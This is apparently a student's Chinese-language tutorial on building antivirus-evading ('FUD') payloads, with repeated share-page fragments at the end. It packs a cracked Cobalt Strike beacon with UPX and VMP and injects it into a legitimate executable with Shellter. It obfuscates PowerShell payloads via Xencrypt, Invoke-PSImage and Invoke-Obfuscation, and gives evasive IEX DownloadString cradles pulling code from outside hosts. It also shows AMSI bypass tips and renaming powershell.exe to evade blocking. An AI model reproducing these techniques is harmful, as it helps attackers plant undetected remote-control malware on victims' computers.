) FUD Payload Construction (

] FUD Payload Construction [
-==[ BJSDFZ Class 15 姜亚辰 ]==-
_____ __ ___ ____ _____

| __ \ /\\ \ / / | / __ \ /\ | __ \
| |__) / \\ \_/ /| | | | | | / \ | | | |
| ___/ /\ \\ / | | | | | |/ /\ \ | | | |
| | / ____ \| | | |___| |__| / ____ \| |__| |
|_| /_/ \_\_| |______\____/_/ \_\_____/
温馨提示：本文件内容请不要随意试来逝去，小心被 FBI
-==[ 0X01 Introduction

众所周知，在进刑渗透的时候，普通的 payload 很容易就被抓到了。
此处给出我常使用的优秀避规方案......
-==[ 0X02 Index

1：使用 upx，vmp 等 packers 加壳
2：使用 python，go，易语言等其他语言进行包装。（兼容性略差，否决）
3：对 shellcode 进行加密，混淆(msfvenom 的 x86/shikata_ga_nai 已经不好用了)
4：使用偏门远控（向日葵）
5：powershell（就逝它了）
-==[ 0X03 Brief Interview

All information from tidesec：
https://imgconvert.csdnimg.cn/
-==[ 0X04 Tools
cobalt strike 4.0
metasploit framework
Invoke-obfuscation
kali-wslinux
invoke-psimage
Virustotal
-==[ 0X05 Starting the test

将 Windows10 更新至最新版本
安装 Windows terminal 和 kali linux 以便使用
打开 kali 窗口，进入 root 用户（sudo su）
安装 jdk（bushi jre）apt install openjdk-8-jdk
将 pojie 版的 CobaltStrike 克隆至本地（curl wget git 皆可）
进入文件夹，激活团队服务器（./teamserver 192.168.xx.xx password）
双击运行 cs.bat,填入服务器信息并连接
新建一个监听器，生成一个 payload（artifact.exe）
双击运行然后测试一下连接情况（上线成功，远程 beacon 可用）
然后直接扔上 vt
当场暴毙
]TYPE 1{
接下来再加点料，用 upx 包装一下
先安装 upx：apt install upx
┌──(root㉿A0L9E8X7-workstation)-[/mnt/c/Users/HP/Desktop]
└─# upx artifact.exe
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2020
UPX 3.96 Markus Oberhumer, Laszlo Molnar & John Reiser Jan 23rd 2020
File size Ratio Format Name
-------------------- ------ ----------- -----------
artifact.exe [**************************************************] 19.1%
14336 -> 8192 57.14% win32/pe artifact.exe
Packed 1 file: 1 ok, 0 error.
经过测试还是会逝。
现在把壳换成 vmp 试试
伟大的进步，但也就止步于此（可能因为 vmp 版本较老，没产生效果）。
能 bypass Mcafee 和卡巴斯基倒也算惊喜，适合用来当炮灰，需要结合目标系统实际情况来进

行针对性处理。
以我 la ji 的技术，纯 EXE 免杀肯定是不行了，网上的几个 loader 也被杀的很厉害。果断放

弃直接免杀。
]TYPE 2[
尝试使用注入免杀（代表工具：shellter，backdoorfactory）
原文件查杀率
使用 shellter 进行注入：
1010101 01 10 0100110 10 01 11001001 0011101 001001
11 10 01 00 01 01 01 10 11 10
0010011 1110001 11011 11 10 00 10011 011001
11 00 10 01 11 01 11 01 01 11
0010010 11 00 0011010 100111 000111 00 1100011 01 10 v7.2
www.ShellterProject.com
Choose Operation Mode - Auto/Manual (A/M/H): M
PE Target: C:\Users\HP\Desktop\DaLiuRen.exe
**********
* Backup *
**********
Backup: Shellter_Backups\DaLiuRen.exe
********************************
* PE Compatibility Information *
********************************
Minimum Supported Windows OS: 4.0
Note: It refers to the minimum required Windows version for the target
application to run. This information is taken directly from the
PE header and might be not always accurate.
******************
* Packed PE Info *
******************
Status: Possibly Not Packed - The EntryPoint is located in the first section!
***********************
* PE Info Elimination *
***********************
Data: Dll Characteristics (Dynamic ImageBase etc...), Digital Signature.
Status: All related information has been eliminated!
Gather Dynamic Thread Context Info? (Y/N/H): Y
Number of Instructions: 10
Check for SelfModifying Code while Tracing? (Y/N/H): Y
Pause Tracing at SelfModifying Code Detection? (Y/N/H): Y
Show Real-Time Tracing? (Y/N/H): Y
****************
* Tracing Mode *
****************
Status: Tracing has started! Press CTRL+C to interrupt tracing at any time.
DisASM.dll was created successfully!
The following PEB flags have been reset:
1. PEB.BeingDebugged
2. PEB.NtGlobalFlag
40145c jmp 0040146Eh <0>
40146e mov eax, dword ptr [004C508Bh] <1>
401473 shl eax, 02h <2>
401476 mov dword ptr [004C508Fh], eax <3>
40147b push edx <4>
40147c push 00000000h <5>
40147e call 004C3CC2h <6>
4c3cc2 jmp dword ptr [004E5388h] <7>
401483 mov edx, eax <8>
401485 call 004B6424h <9>
Tracing has been completed successfully!
Tracing Time Approx: 0.0171 mins.
Starting First Stage Filtering...
*************************
* First Stage Filtering *
*************************
Filtering Time Approx: 0 mins.
Enable Stealth Mode? (Y/N/H): N
Shellter couldn't access the selected file containing the payload
and/or the file is empty or too big!
Make sure that the file exists and that is not used by another process.
Max file path length: 260 chars.
************
* Payloads *
************
[1] Meterpreter_Reverse_TCP [stager]
[2] Meterpreter_Reverse_HTTP [stager]

[3] Meterpreter_Reverse_HTTPS [stager]
[4] Meterpreter_Bind_TCP [stager]
[5] Shell_Reverse_TCP [stager]
[6] Shell_Bind_TCP [stager]
[7] WinExec
Use a listed payload or custom? (L/C/H): C
Select Payload: C:\Users\HP\Desktop\aaaaaaaaaaaaaaaaaaaaaaaa.exe
Is this payload a reflective DLL loader? (Y/N/H): N
Is the Payload Encoded? (Y/N/H): N
Encode Payload with Shellter? (Y/N/H): Y
Encode Payload using DTCK? (Y/N/H): H
Info: Dynamic Thread Context Key.
Shellter will make use of gathered dynamic thread context information
as encoding key. This key doesn't have to be hardcoded, and it will
exist at the right moment during the execution of the infected PE file.
Note: Experimental feature.
Encode Payload using DTCK? (Y/N/H): Y
Obfuscate Shellter's Decoder? (Y/N/H): Y
Enable User Defined Encoding Sequence? (Y/N/H): N
******************
* Encoding Stage *
******************
Encoding Payload: Done!
****************************
* Assembling Decoder Stage *
****************************
Assembling Decoder: Done!

***********************************
* Binding Decoder & Payload Stage *
***********************************
Status: Obfuscating the Decoder using Thread Context Aware Polymorphic
code, and binding it with the payload.
Please wait...
Binding: Done!
Enable User Defined Encoding Sequence? (Y/N/H): N
******************
* Encoding Stage *
******************
Encoding Payload: Done!
****************************
* Assembling Decoder Stage *
****************************
Assembling Decoder: Done!
***********************************
* Binding Decoder & Payload Stage *
***********************************
Status: Obfuscating the Decoder using Thread Context Aware Polymorphic
code, and binding it with the payload.
Please wait...
Binding: Done!
Use IAT Handlers or Change Section's Permissions? (I/P/H): I
*********************
* IAT Handler Stage *
*********************
Fetching IAT Pointers to Memory Manipulation APIs...
0. VirtualAlloc --> IAT[4e5484]
1. VirtualAllocEx --> N/A
2. VirtualProtect --> N/A
3. VirtualProtectEx --> N/A
4. HeapCreate/HeapAlloc --> N/A
5. LoadLibrary/GetProcAddress --> IAT[4e5410]/IAT[4e5394]
6. GetModuleHandle/GetProcAddress --> IAT[4e5388]/IAT[4e5394]
7. CreateFileMapping/MapViewOfFile --> N/A
Choose one of the available methods: 6
****************
* Payload Info *
****************
Payload: C:\Users\HP\Desktop\aaaaaaaaaaaaaaaaaaaaaaaa.exe
Size: 15862 bytes
Reflective Loader: NO
Encoded-Payload Handling: Enabled
Handler Type: IAT
Obfuscate IAT Handler? (Y/N/H): Y
***************************
* IAT Handler Obfuscation *
***************************
Status: Binding the IAT Handler with Thread Context Aware Polymorphic code.
Please wait...
Code Generation Time Approx: 0 seconds.
Prepend PolyMorphic Code? (Y/N/H): Y
Prepend User/Engine PolyMorphic Code (U/E/H): E

Min Input: 20 Bytes
Max Input: 10000 Bytes
Size of PolyCode (Approx): 10000
*************************
* PolyMorphic Junk Code *
*************************
Type: Engine
Generating: ~10000 bytes of PolyMorphic Junk Code
Please wait...
Generated: 10000 bytes
Code Generation Time Approx: 0 seconds.
Starting Second Stage Filtering...
**************************
* Second Stage Filtering *
**************************
Starting third stage filtering...
*************************
* Third Stage Filtering *
*************************
Show Disassembled Entries? (Y/N/H): Y
Total Entries: 2
Valid Index Values: 0 - 1
Select Start Entry: 0
Select End Entry: 1
401483 mov edx, eax <0>

401485 call 004B6424h <1>
Show more entries? (Y/N): N
Total Entries: 2
Valid values: 0 <= value <= 1
Select <Index> of VA to Start Injection: 0
*******************
* Injection Stage *
*******************
Virtual Address: 0x401483
File Offset: 0xa83
Section: .text
Adjusting stub pointers to IAT...
Done!
Adjusting Call Instructions Relative Pointers...
Done!
Injection Completed!
*******************
* PE Checksum Fix *
*******************
Status: Valid PE Checksum has been set!
Original Checksum: 0x0
Computed Checksum: 0x1cf91b
**********************
* Verification Stage *
**********************
Info: Shellter will verify that the first instruction of the
injected code will be reached successfully.

If polymorphic code has been added, then the first
instruction refers to that and not to the effective
payload.
Max waiting time: 10 seconds.
Warning!
If the PE target spawns a child process of itself before
reaching the injection point, then the injected code will
be executed in that process. In that case Shellter won't
have any control over it during this test.
You know what you are doing, right? ;o)
Injection: Verified!
Press [Enter] to continue...
扔到 VT 上查杀一番，然后 VT 暴毙了
换成 VirScan 再次查杀：
完美，国内的杀软没一个查出来的
之后又用 VT 杀了一遍，结果是 70/5，已经很刑了（此时我深刻的感受到了 windowsdefender

的强大）。
静态免杀不代表真的免杀，还是要结合实际情况，少进行敏感操作，避免被行为杀。
我在 exe 方面的极致也就如此了。。。
] TYPE 3 [ Powershell x Cobaltstrike 神仙联动
powershell 的优点：无文件落地，简单，实用，免杀姿势多。
先看看 Cobaltstrike 自动生成的 ps 的免杀率
跟 exe 比起来天差地别，最高免杀率都是 45/16
接下来再用 Invoke-Xencrypt 来加密一下：
PS C:\Users\HP\Desktop> Invoke-Xencrypt -InFile C:\Users\HP\Desktop\payload.ps1 -

OutFile banana.ps1 -Iterations 20
Xencrypt Copyright (C) 2020 Xentropy ( @SamuelAnttila )
This program comes with ABSOLUTELY NO WARRANTY; for details type show w'.
This is free software, and you are welcome to redistribute it
under certain conditions.
[*] Reading 'C:\Users\HP\Desktop\payload.ps1' ...

[*] Starting code layer ...
[*] Compressing ...
[*] Generating encryption key ...
[*] Encrypting ...
[*] Finalizing code layer ...
[*] Writing 'banana.ps1' ...
[+] Done!
PS C:\Users\HP\Desktop>
然后再上 VirScan 逝一下：
已经在 power shell 里算高的了，再去逝世别的方法。。
新方法：将脚本导入一个图片，然后使用 sal 命令来进行操作
先把 invokePSimage 下载至本地
然后打开 powershell：Import-Module .\Invoke-PSImage.ps1
PS E:\recovery\Desktop\tools\crypt3r5> Invoke-PSImage -Script

C:\Users\HP\Desktop\payload.ps1 -Image .\asd.png -Out C:\Users\HP\Desktop\play.png
sal a New-Object;Add-Type -A System.Drawing;$g=a

System.Drawing.Bitmap("C:\Users\HP\Desktop\play.png");$o=a Byte[]
5120;(0..1)|%{foreach($x
in(0..2559)){$p=$g.GetPixel($x,$_);$o[$_*2560+$x]=([math]::Floor(($p.B-band15)*16)-
bor($p.G-
band15))}};$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString($o[0..3534]))
PS E:\recovery\Desktop\tools\crypt3r5>
nice!
完全 fud 了，不过不慌，还是要先看运行命令免不免杀。
查杀率 2/45 还行，用 xencrypt 再整一下试试，但 2/45 没有变化，估计 xencrypt 的特征已经

被定位了。
换成 invoke-obfuscation 试试
Tool :: Invoke-Obfuscation
Author :: Daniel Bohannon (DBO)
Twitter :: @danielhbohannon
Blog :: http://danielbohannon.com
Github :: https://github.com/danielbohannon/Invoke-Obfuscation
Version :: 1.8
License :: Apache License, Version 2.0
Notes :: If(!$Caffeinated) {Exit}
HELP MENU :: Available options shown below:
[*] Tutorial of how to use this tool TUTORIAL
[*] Show this Help Menu HELP,GET-HELP,?,-?,/?,MENU

[*] Show options for payload to obfuscate SHOW OPTIONS,SHOW,OPTIONS
[*] Clear screen CLEAR,CLEAR-HOST,CLS
[*] Execute ObfuscatedCommand locally EXEC,EXECUTE,TEST,RUN
[*] Copy ObfuscatedCommand to clipboard COPY,CLIP,CLIPBOARD
[*] Write ObfuscatedCommand Out to disk OUT
[*] Reset ALL obfuscation for ObfuscatedCommand RESET
[*] Undo LAST obfuscation for ObfuscatedCommand UNDO
[*] Go Back to previous obfuscation menu BACK,CD ..
[*] Quit Invoke-Obfuscation QUIT,EXIT
[*] Return to Home Menu HOME,MAIN
Choose one of the below options:
[*] TOKEN Obfuscate PowerShell command Tokens
[*] AST Obfuscate PowerShell Ast nodes (PS3.0+)
[*] STRING Obfuscate entire command as a String
[*] ENCODING Obfuscate entire command via Encoding
[*] COMPRESS Convert entire command to one-liner and Compress
[*] LAUNCHER Obfuscate command args w/Launcher techniques (run once at end)
Invoke-Obfuscation> set scriptpath C:\Users\HP\Desktop\banana.ps1
Successfully set ScriptPath:
C:\Users\HP\Desktop\banana.ps1
Choose one of the below options:
[*] TOKEN Obfuscate PowerShell command Tokens
[*] AST Obfuscate PowerShell Ast nodes (PS3.0+)
[*] STRING Obfuscate entire command as a String
[*] ENCODING Obfuscate entire command via Encoding
[*] COMPRESS Convert entire command to one-liner and Compress
[*] LAUNCHER Obfuscate command args w/Launcher techniques (run once at end)
Invoke-Obfuscation> encoding
Choose one of the below Encoding options to APPLY to current payload:
[*] ENCODING\1 Encode entire command as ASCII
[*] ENCODING\2 Encode entire command as Hex
[*] ENCODING\3 Encode entire command as Octal
[*] ENCODING\4 Encode entire command as Binary
[*] ENCODING\5 Encrypt entire command as SecureString (AES)
[*] ENCODING\6 Encode entire command as BXOR
[*] ENCODING\7 Encode entire command as Special Characters
[*] ENCODING\8 Encode entire command as Whitespace
Invoke-Obfuscation\Encoding> 5
Executed:
CLI: Encoding\5
FULL: Out-SecureStringCommand -ScriptBlock $ScriptBlock -PassThru
Result:
( [RuNTime.iNTerOpSERVICes.MarsHal]::pTRtoStRingAnSi( [RuntiME.iNTErOpSERviCEs.marS
Hal]::sECurEstrIngTOGLOBalALloCansi($('76492d1116743f0423413b16050a5345MgB8AHoAdABJ
AFUAUABYAC8AdwBqAHYAOABOAGYAQgBHACsAVwBkAEgATwB5AEEAPQA9AHwAZgA43ADMANABiADYANAAyAG
MAOABlAGMANAA2AGQAOAAzAGIAMQBmAGQAYQA4ADUAOQAyAGMANAA5ADgAZQBjADgAYwAzAGQAMABmAGIAN
QA2ADIAZgA1ADcANwAwAGQAZABhADUAZAA1ADYAYQA1ADAANAA2ADgAMABjAGEANgBjADUAZQAxADIAYwBm
AGYAYwBhADAAYgAxADcAMAA3ADQAYQA2ADcAYQAyADEANgBmAGYAYwAzAGYAOABiAGMANgAwADgAYwAxAGU
ANQAyAGEANwBkADIAOAAxAGUAZABhADIAOQBlADUANAAxADgAMwAwADkAZgBkADEAMAAxAGYANgA3AA=='
| CoNvERTTO-SeCUreSTRInG -K (144..167))) ) )| &( $SHEllId[1]+$sheLlId[13]+'x')

Invoke-Obfuscation\Encoding> 7
Executed:
CLI: Encoding\7
FULL: Out-EncodedSpecialCharOnlyCommand -ScriptBlock $ScriptBlock -PassThru
Result:
${!+-}=+$( ) ; ${]} =${!+-} ;${-``@}=++ ${!+-} ;${+%}= ( ${!+-} =

${!+-}+ ${-``@}); ${``*} = ( ${!+-} =${!+-}+ ${-``@} ) ;${)+/} = (${!+-}
=${!+-}+ ${-``@} ); ${#}= (${!+-} = ${!+-}+${-``@} );${``'@}=( ${!+-}=
${!+-} + ${-``@}) ; ${=} = ( ${!+-}= ${!+-} + ${-``@}) ;${``} =
( ${!+-}= ${!+-} + ${-``@} ); ${/#}= (${!+-}=${!+-} +${-``@} ); ${``@'}
="["+"$(@{})"[ ${=}]+"$(@{})"["${-``@}"+ "${/#}" ]+"$(@{} ) "[ "${+%}" +
"${]}" ]+ "$? "[ ${-``@}]+ "]" ;${!+-} ="".("$( @{ } )"[ "${-``@}"+
"${)+/}" ]+ "$(@{} ) "["${-``@}"+ "${``'@}" ] +"$(@{ }) "[ ${]} ]
+"$( @{})"[ ${)+/}]+ "$? "[ ${-``@}] +"$( @{} )"[ ${``*}]) ;${!+-}
="$( @{})"[ "${-``@}" + "${)+/}" ] +"$(@{ }) "[${)+/}]+"${!+-}"["${+%}"
+"${=}"];"${!+-} (${``@'}${)+/}${]}+ ${``@'}${``*}${+%}+${``@'}${/#}${-``@} +
${``@'}${``}${+%} +${``@'}${-``@}${-``@}${=} + ${``@'}${=}${``}#}${``*} +
${``@'}${)+/}${``*} + ${``@'}${``*}${``'@} +${``@'}${-``@}${-``@}${#}+
${``@'}${-``@}${]}${)+/} + ${``@'}${-``@}${]}${-``@} +${``@'}${=}${``'@} +
${``@'}${-``@}${]}${``}+ ${``@'}${=}${``*} +${``@'}${-
``@}${]}${]}+${``@'}${/#}${-``@}+${``@'}${)+/}${/#}+ ${``@'}${#}${-``@} +
${``@'}${/#}${``*} + ${``@'}${)+/}${``*}+ ${``@'}${``*}${/#} +${``@'}${-
``@}${+%}${]}+ ${``@'}${``*}${/#} +${``@'}${)+/}${-``@} ) "| & ${!+-}
WARNING: This command exceeds the cmd.exe maximum length of 8190.
Its length is 81808 characters.

Invoke-Obfuscation\Encoding> out C:\Users\HP\Desktop\banana3.ps1
Successfully output ObfuscatedCommand to C:\Users\HP\Desktop\banana3.ps1.
现在完全刑了，进电脑一声不响。
-==[ 0X06 How It Ends ......

在输入这些命令的时候，肯定会调用 powershell，而杀软对 powershell 的拦截是很猛的。对
于这种情况，我们需要对 powershell 命令进行一些特殊的处理。
杀软对 power shell 的查杀方式大致分为以下两种
1：杀软会对 powershell 命令当中的参数、函数进行检测
2：杀软检测 powershell 使用的动作

3: AMSI(使用 https://amsi.fail 上生成的指令绕过即可)
对于前者，使用语法拼接命令中的关键字（如：http，IEX。拼接后转化
为:downloadstring(''ht';$b='tp://109.xx.xx.xx/a''))';IEX ($a+$b)"）
而后者则更难处理一些，因为它会拦截 powershell 这个程序。对于这种不讲武德的行为，我们是无法容忍的。
对于这种拦截可以使用 copy 命令进行 bypass，原理就是 av 不让用 powershell 于是我们把 powershell.exe 复制

到另一个文件夹然后重命名。因为这类杀软检测的是进程中 powershell.exe 这个名字的字符串，改了，自然就放
行了。。。
copy C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe backs.ps1.exe
//此处命名为 ps1 是因为 powershell 的图标不好改。
然后运行 backs.ps1.exe 即可。
C:\Users\HP>copy C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe backs.ps1.exe
已复制 1 个文件。
C:\Users\HP>backs.ps1.exe
Windows PowerShell
版权所有 (C) Microsoft Corporation。保留所有权利。
尝试新的跨平台 PowerShell https://aka.ms/pscore6
PS C:\Users\HP> cd
NICE!
用超长命令$拼接也可以试试：
powershell.exe -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w

Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w
Normal -w Normal set-alias -name key -value IEX; key(New-Object
Net.WebClient).DownloadString('ht‘+’tp://x.x.x.x/a')
当然除了上述的几种方式可以进行 bypass 以外，还有其他的方法，例如可以将 powershell 命令打包成 exe 程序

进行绕过，可以使用 C、Python、go 等，其中查杀率：C > Python > go
“当然了，年轻人是要讲武德的，切勿利用上述方法去干不讲武德的事情，不然到时候啪的一下，很快啊，一不
小心就进去了。” ------某大佬
感谢老师和同学们的阅读
-------------A0L9E8X7 BJSDFZ Class 15
-==[References]==-
powershell 部分:
https://www.cnblogs.com/chen-w/p/14726549.html
http://www.virscan.org/report/32bf9ca74eba65594c99a907e4274879
00690ae05a6ae6f6a1514b597cc8e714
https://blog.csdn.net/qq_50854790/article/details/124705800
https://cloud.tencent.com/developer/article/1799004?from=artic
le.detail.1895835
https://cloud.tencent.com/developer/article/1078147?from=artic
le.detail.1895835
https://amsi.fail/
EXE 部分：
https://blog.csdn.net/fallfeather/article/details/104274740
ASCII ART
http://patorjk.com/software

) FUD Payload Construction (

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

) FUD Payload Construction (

Uploaded by

Copyright:

Available Formats

] FUD Payload Construction [

-==[ BJSDFZ Class 15 姜亚辰 ]==-

_____ __ ___ ____ _____

-==[ 0X01 Introduction

-==[ 0X02 Index

3：对 shellcode 进行加密，混淆(msfvenom 的 x86/shikata_ga_nai 已经不好用了)

-==[ 0X03 Brief Interview

-==[ 0X04 Tools

cobalt strike 4.0

-==[ 0X05 Starting the test

安装 Windows terminal 和 kali linux 以便使用

打开 kali 窗口，进入 root 用户（sudo su）

安装 jdk（bushi jre）apt install openjdk-8-jdk

将 pojie 版的 CobaltStrike 克隆至本地（curl wget git 皆可）

进入文件夹，激活团队服务器（./teamserver 192.168.xx.xx password）

双击运行然后测试一下连接情况（上线成功，远程 beacon 可用）

接下来再加点料，用 upx 包装一下

先安装 upx：apt install upx

└─# upx artifact.exe

Ultimate Packer for eXecutables

Copyright (C) 1996 - 2020

File size Ratio Format Name

-------------------- ------ ----------- -----------

artifact.exe [**************************************************] 19.1%

14336 -> 8192 57.14% win32/pe artifact.exe

Packed 1 file: 1 ok, 0 error.

能 bypass Mcafee 和卡巴斯基倒也算惊喜，适合用来当炮灰，需要结合目标系统实际情况来进

以我 la ji 的技术，纯 EXE 免杀肯定是不行了，网上的几个 loader 也被杀的很厉害。果断放

1010101 01 10 0100110 10 01 11001001 0011101 001001

0010011 1110001 11011 11 10 00 10011 011001

0010010 11 00 0011010 100111 000111 00 1100011 01 10 v7.2

Choose Operation Mode - Auto/Manual (A/M/H): M

Minimum Supported Windows OS: 4.0

application to run. This information is taken directly from the

PE header and might be not always accurate.

Data: Dll Characteristics (Dynamic ImageBase etc...), Digital Signature.

Status: All related information has been eliminated!

Gather Dynamic Thread Context Info? (Y/N/H): Y

Check for SelfModifying Code while Tracing? (Y/N/H): Y

Pause Tracing at SelfModifying Code Detection? (Y/N/H): Y

Show Real-Time Tracing? (Y/N/H): Y

DisASM.dll was created successfully!

The following PEB flags have been reset:

40146e mov eax, dword ptr [004C508Bh] <1>

401473 shl eax, 02h <2>

401476 mov dword ptr [004C508Fh], eax <3>

40147b push edx <4>

40147c push 00000000h <5>

40147e call 004C3CC2h <6>

4c3cc2 jmp dword ptr [004E5388h] <7>

401483 mov edx, eax <8>

401485 call 004B6424h <9>

Tracing has been completed successfully!

Tracing Time Approx: 0.0171 mins.

Starting First Stage Filtering...

* First Stage Filtering *

Filtering Time Approx: 0 mins.

Enable Stealth Mode? (Y/N/H): N

Shellter couldn't access the selected file containing the payload

and/or the file is empty or too big!

Max file path length: 260 chars.

[1] Meterpreter_Reverse_TCP [stager]

[2] Meterpreter_Reverse_HTTP [stager]

___ _ ___